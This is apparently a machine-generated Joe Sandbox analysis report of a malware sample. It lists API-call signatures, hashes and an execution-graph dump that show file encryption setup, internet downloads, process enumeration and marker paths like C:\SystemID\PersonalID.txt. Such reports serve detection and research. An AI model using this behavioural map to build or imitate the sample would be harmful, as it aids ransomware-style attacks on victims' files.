                                                                                                                            • Instruction ID: aa83e36ecf1928e0c829979c4a0a4c0797398d587a358dcc9f9cd6b212a53b62
                                                                                                                            • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                            • Instruction Fuzzy Hash: D8010232000119BBCF12AF55EC09EDA3FAAFF8E714F158014F91862161D332E961EBA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00485007: __getptd_noexit.LIBCMT ref: 00485008
                                                                                                                              • Part of subcall function 00485007: __amsg_exit.LIBCMT ref: 00485015
                                                                                                                            • __calloc_crt.LIBCMT ref: 00485A01
                                                                                                                              • Part of subcall function 00488C96: __calloc_impl.LIBCMT ref: 00488CA5
                                                                                                                            • __lock.LIBCMT ref: 00485A37
                                                                                                                            • ___addlocaleref.LIBCMT ref: 00485A43
                                                                                                                            • __lock.LIBCMT ref: 00485A57
                                                                                                                              • Part of subcall function 00485208: __getptd_noexit.LIBCMT ref: 00485208
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2580527540-0
                                                                                                                            • Opcode ID: a5201d8d6dce44cfc7f11cb4c3fe1893225cf77f71d12174c504fe12e093c0f6
                                                                                                                            • Instruction ID: 4f10bcbaa1a994ba95705a3ca5f9901736cc9a6652770eb57c27fddcf34c7cfb
                                                                                                                            • Opcode Fuzzy Hash: a5201d8d6dce44cfc7f11cb4c3fe1893225cf77f71d12174c504fe12e093c0f6
                                                                                                                            • Instruction Fuzzy Hash: 6E014071541701EBD724FFAA8442B1D7BE0AF85728F604A4FF4559B2C2CE7C49418B69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3016257755-0
                                                                                                                            • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                            • Instruction ID: d5fb4a527ae2fd50d63a95ec52629ce4902c0be0efde536435da304a19ad4a91
                                                                                                                            • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                            • Instruction Fuzzy Hash: 1F01407640024EBFCF125E85CC428EE3F66BB3E354F588416FE1958131C23AC9B2AB85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • lstrlenW.KERNEL32 ref: 004727B9
                                                                                                                            • _malloc.LIBCMT ref: 004727C3
                                                                                                                              • Part of subcall function 00480C62: __FF_MSGBANNER.LIBCMT ref: 00480C79
                                                                                                                              • Part of subcall function 00480C62: __NMSG_WRITE.LIBCMT ref: 00480C80
                                                                                                                              • Part of subcall function 00480C62: RtlAllocateHeap.NTDLL(00A90000,00000000,00000001,?,?,?,?,00483B69,?), ref: 00480CA5
                                                                                                                            • _memset.LIBCMT ref: 004727CE
                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004727E4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2824100046-0
                                                                                                                            • Opcode ID: ba6c40985c3acdcca34163e2616274c5fa1b84f182fbba384ba462272f2e5998
                                                                                                                            • Instruction ID: cb95aba7358274ad346eb336a2b2e70f431ca86fbd866e0a79358e66e078d918
                                                                                                                            • Opcode Fuzzy Hash: ba6c40985c3acdcca34163e2616274c5fa1b84f182fbba384ba462272f2e5998
                                                                                                                            • Instruction Fuzzy Hash: EAF02735701204BBE72066659C4FFBF7A9DDF86764F100129B604E32D2EA512D0552F5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • lstrlenA.KERNEL32 ref: 00472806
                                                                                                                            • _malloc.LIBCMT ref: 00472814
                                                                                                                              • Part of subcall function 00480C62: __FF_MSGBANNER.LIBCMT ref: 00480C79
                                                                                                                              • Part of subcall function 00480C62: __NMSG_WRITE.LIBCMT ref: 00480C80
                                                                                                                              • Part of subcall function 00480C62: RtlAllocateHeap.NTDLL(00A90000,00000000,00000001,?,?,?,?,00483B69,?), ref: 00480CA5
                                                                                                                            • _memset.LIBCMT ref: 0047281F
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00472832
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2824100046-0
                                                                                                                            • Opcode ID: 61c08ecc5b938af7da828bfe379d8873654ffa06736869913326384ce959dba2
                                                                                                                            • Instruction ID: 2dff85dbc8a1f8c10c09fa7dd81d56327f55088363b63b2bbc057ff0a88b59cc
                                                                                                                            • Opcode Fuzzy Hash: 61c08ecc5b938af7da828bfe379d8873654ffa06736869913326384ce959dba2
                                                                                                                            • Instruction Fuzzy Hash: 94E086763015247BE520235A6C4FFAF6A1CCFC37A5F100516F611D22E38A941C0692B4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 4104443479-4289949731
                                                                                                                            • Opcode ID: 6ef144a9db13f2d4f1c3930286c27f614ea270e5d0ffd45c2eed227c2aa20958
                                                                                                                            • Instruction ID: 9f3977e2a26e072fbcdeefb61b6b3eff430cb5414efe151019f6d2d6ee6dad43
                                                                                                                            • Opcode Fuzzy Hash: 6ef144a9db13f2d4f1c3930286c27f614ea270e5d0ffd45c2eed227c2aa20958
                                                                                                                            • Instruction Fuzzy Hash: 12C12B70700619DBCB24CF58D9C09BAB3B6FFC5304B20852EE44A8B655DB34ED56CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 4104443479-4289949731
                                                                                                                            • Opcode ID: 6d2325827aaeae8850625d2e0ea74bcca7f2cb4f22652f3a9ddbb34e71ab8492
                                                                                                                            • Instruction ID: 1c78b780bf9a620a29811a304f661095fe958588e7493dd73cd188f86a60d4d1
                                                                                                                            • Opcode Fuzzy Hash: 6d2325827aaeae8850625d2e0ea74bcca7f2cb4f22652f3a9ddbb34e71ab8492
                                                                                                                            • Instruction Fuzzy Hash: 4F5180316042099BCF24DF18C9808EA77A6FF85304BA0896EE8598B351D735ED558BE9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 0047B1BA
                                                                                                                              • Part of subcall function 004711C0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?,?), ref: 0047120F
                                                                                                                              • Part of subcall function 004711C0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00471228
                                                                                                                              • Part of subcall function 004711C0: CloseHandle.KERNEL32(00000000), ref: 0047123D
                                                                                                                              • Part of subcall function 004711C0: MoveFileW.KERNEL32(?,?), ref: 00471277
                                                                                                                              • Part of subcall function 0047BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0047BA4A
                                                                                                                              • Part of subcall function 0047BA10: RegisterClassExW.USER32(00000030), ref: 0047BA73
                                                                                                                              • Part of subcall function 0047BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0047BAAD
                                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0047B4B3
                                                                                                                            • TranslateMessage.USER32(?), ref: 0047B4CD
                                                                                                                            • DispatchMessageW.USER32(?), ref: 0047B4D7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                                            • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                                            • API String ID: 441990211-897913220
                                                                                                                            • Opcode ID: 389ef00e01722538b4d64c8b5896df82d9f899271ecc8d454bd3519306189b85
                                                                                                                            • Instruction ID: a133d328db52ea1cae40b3c62092b56500976433536ad120df0f18bf4e73d337
                                                                                                                            • Opcode Fuzzy Hash: 389ef00e01722538b4d64c8b5896df82d9f899271ecc8d454bd3519306189b85
                                                                                                                            • Instruction Fuzzy Hash: AB5166715142455BC724FF62C992AEEB7A8FF54348F40C82EF44E43162EF78A609CB96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0048AB93
                                                                                                                            • ___raise_securityfailure.LIBCMT ref: 0048AC7A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                            • String ID: 8W
                                                                                                                            • API String ID: 3761405300-2509821728
                                                                                                                            • Opcode ID: 64ee1a73df179552024213226afbd529194318e49cc028ce25e78e5543d8b6fa
                                                                                                                            • Instruction ID: 3132e605912e133f82f1ca4996622d756ba7569dcf55d633a52aded3e3d8f047
                                                                                                                            • Opcode Fuzzy Hash: 64ee1a73df179552024213226afbd529194318e49cc028ce25e78e5543d8b6fa
                                                                                                                            • Instruction Fuzzy Hash: AD21C4B5510304DBD7A0DF55F9956047BE8AB68350F10682AE90C8B6E0E2F169C8FF46
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00473CA0
                                                                                                                              • Part of subcall function 00483B4C: _malloc.LIBCMT ref: 00483B64
                                                                                                                            • _memset.LIBCMT ref: 00473C83
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                                                                                                            • String ID: vector<T> too long
                                                                                                                            • API String ID: 1327501947-3788999226
                                                                                                                            • Opcode ID: cd800497b728d5f9457137e52c5e2aa5ebd0d740b42a8c41208ae6fc204b041e
                                                                                                                            • Instruction ID: 18db1ced95fd6284bd47f09f23934aa2aa0b6eaefcaec78b6cf6294e361dcb85
                                                                                                                            • Opcode Fuzzy Hash: cd800497b728d5f9457137e52c5e2aa5ebd0d740b42a8c41208ae6fc204b041e
                                                                                                                            • Instruction Fuzzy Hash: 1B01D2F25003005BE330AF1AD801797B6E8AF50B25F10882EE99893781E7B9E944C799
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _fputws$CreateDirectory
                                                                                                                            • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                            • API String ID: 2590308727-54166481
                                                                                                                            • Opcode ID: 4156211a67917c2de7320f5cf6972a1e45403c88da7e397430b2d95c6ced4196
                                                                                                                            • Instruction ID: c247d106844b85cc5bc76bc46d1f7014939a6aa7cfc9f9ce621274da3ce56af5
                                                                                                                            • Opcode Fuzzy Hash: 4156211a67917c2de7320f5cf6972a1e45403c88da7e397430b2d95c6ced4196
                                                                                                                            • Instruction Fuzzy Hash: A711D072940305ABDF20DF659C963AF76A0AF10718F00092BEC9952241F37A99288BCB
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • Assertion failed: %s, file %s, line %d, xrefs: 00480E13
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __calloc_crt
                                                                                                                            • String ID: Assertion failed: %s, file %s, line %d
                                                                                                                            • API String ID: 3494438863-969893948
                                                                                                                            • Opcode ID: 7e96d92ab9b0e5b8d8536881606d6573401ff37f1113f15ecbc2acd102612bd3
                                                                                                                            • Instruction ID: 56458dbef24f1e0e856a31aa98b2792af362259b99e0ebbf0fc7365f9e70331c
                                                                                                                            • Opcode Fuzzy Hash: 7e96d92ab9b0e5b8d8536881606d6573401ff37f1113f15ecbc2acd102612bd3
                                                                                                                            • Instruction Fuzzy Hash: 0FF0A47131A2118BF764BB76BC11A6E37D4B721724F100C2FF600EA680EB3C9849579A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 004E0686
                                                                                                                              • Part of subcall function 004B4C00: _raise.LIBCMT ref: 004B4C18
                                                                                                                            Strings
                                                                                                                            • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 004E062E
                                                                                                                            • .\crypto\evp\digest.c, xrefs: 004E0638
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset_raise
                                                                                                                            • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                                            • API String ID: 1484197835-3867593797
                                                                                                                            • Opcode ID: 7e1c663466d9bdaf2276e8cd8f13db5fa4a11c6109014f03b63f8c04876246d7
                                                                                                                            • Instruction ID: 06d27f4caf493e386d9ba8b0ad95f11089463cba8687677dd14eb3348537f226
                                                                                                                            • Opcode Fuzzy Hash: 7e1c663466d9bdaf2276e8cd8f13db5fa4a11c6109014f03b63f8c04876246d7
                                                                                                                            • Instruction Fuzzy Hash: 06018B35700200AFC310DF19EC42E5AB7E1AFC8705F19442EF588CB362D761EC958B99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:7.8%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:15%
                                                                                                                            Total number of Nodes:2000
                                                                                                                            Total number of Limit Nodes:192
lstrcpyW lstrcatW lstrcatW 39440->39447 39729 46d240 CoInitialize 39441->39729 39442->39300 39448 46ef50 58 API calls 39443->39448 39450 46ef50 58 API calls 39444->39450 39445->39424 39451 47a3f7 39446->39451 39452 47a674 _memset 39447->39452 39453 47a7ec 39448->39453 39459 47a8da 39450->39459 39451->39300 39457 47a6b4 ShellExecuteExW 39452->39457 39455 47a7f1 lstrlenA 39453->39455 39462 47a72f 39454->39462 39458 480c62 _malloc 58 API calls 39455->39458 39456->39428 39456->39433 39456->39439 39457->39433 39461 47a6e3 39457->39461 39460 47a810 _memset 39458->39460 39463 473ea0 59 API calls 39459->39463 39474 47a92f 39459->39474 39465 47a81e MultiByteToWideChar lstrcatW 39460->39465 39604 47a9d1 39461->39604 39464 473ea0 59 API calls 39462->39464 39467 47a780 39462->39467 39463->39459 39464->39462 39465->39455 39466 47a847 lstrlenW 39465->39466 39468 47a856 39466->39468 39469 47a8a0 CreateMutexA 39466->39469 39470 47a79c CreateThread 39467->39470 39472 473ff0 59 API calls 39467->39472 39811 46e760 39468->39811 39469->39444 39470->39443 41357 47dbd0 39470->41357 39472->39470 39473 47a860 CreateThread WaitForSingleObject 39473->39469 41402 47e690 39473->41402 39475 475c10 59 API calls 39474->39475 39476 47a98c 39475->39476 39822 472840 39476->39822 39478 47a997 39827 470fc0 CryptAcquireContextW 39478->39827 39480 47a9ab 39481 47a9c2 lstrlenA 39480->39481 39482 47a9d8 39481->39482 39481->39604 39483 475c10 59 API calls 39482->39483 39484 47aa23 39483->39484 39485 472840 60 API calls 39484->39485 39486 47aa2e lstrcpyA 39485->39486 39489 47aa4b 39486->39489 39488 475c10 59 API calls 39490 47aa90 39488->39490 39489->39488 39491 46ef50 58 API calls 39490->39491 39492 47aaa0 39491->39492 39493 473ea0 59 API calls 39492->39493 39494 47aaf5 39492->39494 39493->39492 39495 473ff0 59 API calls 39494->39495 39496 47ab1d 39495->39496 39850 472900 39496->39850 39498 46ef50 58 API calls 39500 47abc5 39498->39500 39499 47ab28 _memmove 39499->39498 39501 473ea0 59 API calls 
39500->39501 39502 47ac1e 39500->39502 39501->39500 39503 473ff0 59 API calls 39502->39503 39504 47ac46 39503->39504 39505 472900 60 API calls 39504->39505 39507 47ac51 _memmove 39505->39507 39506 46ef50 58 API calls 39508 47acee 39506->39508 39507->39506 39509 473ea0 59 API calls 39508->39509 39510 47ad43 39508->39510 39509->39508 39511 473ff0 59 API calls 39510->39511 39512 47ad6b 39511->39512 39513 472900 60 API calls 39512->39513 39516 47ad76 _memmove 39513->39516 39514 475c10 59 API calls 39515 47ae2a 39514->39515 39855 473580 39515->39855 39516->39514 39518 47ae3c 39519 475c10 59 API calls 39518->39519 39520 47ae76 39519->39520 39521 473580 59 API calls 39520->39521 39522 47ae82 39521->39522 39523 475c10 59 API calls 39522->39523 39524 47aebc 39523->39524 39525 473580 59 API calls 39524->39525 39526 47aec8 39525->39526 39527 475c10 59 API calls 39526->39527 39528 47af02 39527->39528 39529 473580 59 API calls 39528->39529 39530 47af0e 39529->39530 39531 475c10 59 API calls 39530->39531 39532 47af48 39531->39532 39533 473580 59 API calls 39532->39533 39534 47af54 39533->39534 39535 475c10 59 API calls 39534->39535 39536 47af8e 39535->39536 39537 473580 59 API calls 39536->39537 39538 47af9a 39537->39538 39539 475c10 59 API calls 39538->39539 39540 47afd4 39539->39540 39541 473580 59 API calls 39540->39541 39542 47afe0 39541->39542 39543 473100 59 API calls 39542->39543 39544 47b001 39543->39544 39545 473580 59 API calls 39544->39545 39546 47b025 39545->39546 39547 473100 59 API calls 39546->39547 39548 47b03c 39547->39548 39549 473580 59 API calls 39548->39549 39550 47b059 39549->39550 39551 473100 59 API calls 39550->39551 39552 47b070 39551->39552 39553 473580 59 API calls 39552->39553 39554 47b07c 39553->39554 39555 473100 59 API calls 39554->39555 39556 47b093 39555->39556 39557 473580 59 API calls 39556->39557 39558 47b09f 39557->39558 39559 473100 59 API calls 39558->39559 39560 47b0b6 39559->39560 39561 473580 59 API calls 39560->39561 39562 47b0c2 
39561->39562 39563 473100 59 API calls 39562->39563 39564 47b0d9 39563->39564 39565 473580 59 API calls 39564->39565 39566 47b0e5 39565->39566 39567 473100 59 API calls 39566->39567 39568 47b0fc 39567->39568 39569 473580 59 API calls 39568->39569 39570 47b108 39569->39570 39572 47b130 39570->39572 40039 47cdd0 59 API calls 39570->40039 39573 46ef50 58 API calls 39572->39573 39574 47b16e 39573->39574 39576 47b1a5 GetUserNameW 39574->39576 39862 472de0 39574->39862 39577 47b1c9 39576->39577 39869 472c40 39577->39869 39579 47b1d8 39876 472bf0 39579->39876 39583 47b2f5 39887 4736c0 39583->39887 39587 47b311 39903 4730b0 39587->39903 39589 472c40 59 API calls 39605 47b1f3 39589->39605 39592 472900 60 API calls 39592->39605 39593 47b327 39930 4711c0 CreateFileW 39593->39930 39594 473580 59 API calls 39594->39605 39596 47b33b 40015 47ba10 LoadCursorW RegisterClassExW 39596->40015 39598 473100 59 API calls 39598->39605 39599 47b343 40016 47ba80 CreateWindowExW 39599->40016 39601 47b34b 39601->39604 40019 470a50 GetLogicalDrives 39601->40019 39604->39300 39605->39583 39605->39589 39605->39592 39605->39594 39605->39598 40040 46f1f0 59 API calls 39605->40040 39606 47b379 39607 473100 59 API calls 39606->39607 39608 47b3a5 39607->39608 39609 473580 59 API calls 39608->39609 39632 47b3b3 39609->39632 39610 47b48b 40030 47fdc0 CreateThread 39610->40030 39612 47b49f GetMessageW 39613 47b4bf 39612->39613 39614 47b4ed 39612->39614 39615 47b4c5 TranslateMessage DispatchMessageW KiUserCallbackDispatcher 39613->39615 39617 47b502 PostThreadMessageW 39614->39617 39618 47b55b 39614->39618 39615->39614 39615->39615 39616 47c330 59 API calls 39616->39632 39621 47b510 PeekMessageW 39617->39621 39619 47b564 PostThreadMessageW 39618->39619 39620 47b5bb 39618->39620 39622 47b570 PeekMessageW 39619->39622 39620->39604 39627 47b5d2 CloseHandle 39620->39627 39623 47b546 WaitForSingleObject 39621->39623 39624 47b526 DispatchMessageW PeekMessageW 39621->39624 39625 47b5a6 WaitForSingleObject 
39622->39625 39626 47b586 DispatchMessageW PeekMessageW 39622->39626 39623->39618 39623->39621 39624->39623 39624->39624 39625->39620 39625->39622 39626->39625 39626->39626 39627->39604 39628 47c240 59 API calls 39628->39632 39629 47b8b0 59 API calls 39629->39632 39630 473260 59 API calls 39630->39632 39632->39610 39632->39616 39632->39628 39632->39629 39632->39630 40029 47fa10 CreateThread 39632->40029 41606 487e0e 39633->41606 39635 487f4c 39635->39301 39636->39274 39637->39278 39638->39286 39642->39304 39643->39310 39644->39312 39645->39316 39646->39317 39647->39324 39648->39328 39649->39325 39650->39344 39651->39343 39652->39336 39653->39362 39654->39371 39656 49aeb8 EncodePointer 39655->39656 39656->39656 39657 49aed2 39656->39657 39657->39375 39659 46cf32 _memset __write_nolock 39658->39659 39660 46cf4f InternetOpenW 39659->39660 39661 475c10 59 API calls 39660->39661 39662 46cf8a InternetOpenUrlW 39661->39662 39663 46cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 39662->39663 39671 46cfb2 39662->39671 39664 4756d0 59 API calls 39663->39664 39665 46d000 39664->39665 39666 4756d0 59 API calls 39665->39666 39667 46d049 39666->39667 39667->39671 40041 473010 59 API calls 39667->40041 39669 46d084 39669->39671 40042 473010 59 API calls 39669->40042 39671->39381 39673 473ab2 39672->39673 39679 473ad0 GetModuleFileNameW PathRemoveFileSpecW 39672->39679 39674 473b00 39673->39674 39675 473aba 39673->39675 39677 4af23e 59 API calls 39674->39677 39676 483b4c 59 API calls 39675->39676 39678 473ac7 39676->39678 39677->39678 39678->39679 40043 4af1bb 59 API calls 3 library calls 39678->40043 39682 478400 39679->39682 39683 478437 39682->39683 39687 478446 39682->39687 39683->39687 40044 475d50 59 API calls ___check_float_string 39683->40044 39684 4784b9 39684->39406 39687->39684 40045 478d50 59 API calls 39687->40045 39689 48f7c0 __write_nolock 39688->39689 39690 47222d 7 API calls 39689->39690 39691 4722bd K32EnumProcesses 39690->39691 39692 47228c 
